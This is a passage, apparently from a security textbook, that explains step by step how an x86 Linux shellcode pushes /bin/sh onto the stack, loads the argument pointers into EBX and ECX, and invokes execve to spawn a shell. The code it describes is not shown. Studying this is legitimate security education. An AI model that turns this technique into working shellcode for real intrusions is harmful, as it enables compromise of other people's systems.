
We now create the string on the stack by pushing EAX as string terminated, fol-
lowed by the string /bin/sh (lines 4, 5, and 6). We store the pointer to the string in EBX
(line 7). With this, the first argument is ready. Now that we have the pointer, we build
the array by pushing EAX first (it will serve as array terminator), followed by the pointer
to /bin/sh (line 9). We now load the pointer to the array in the ECX register so that we
can use it as the second argument of the system call.
All arguments are ready. We put the Linux execve system call number in the AL reg-
ister and give the processor back to the kernel so that our code can be executed ...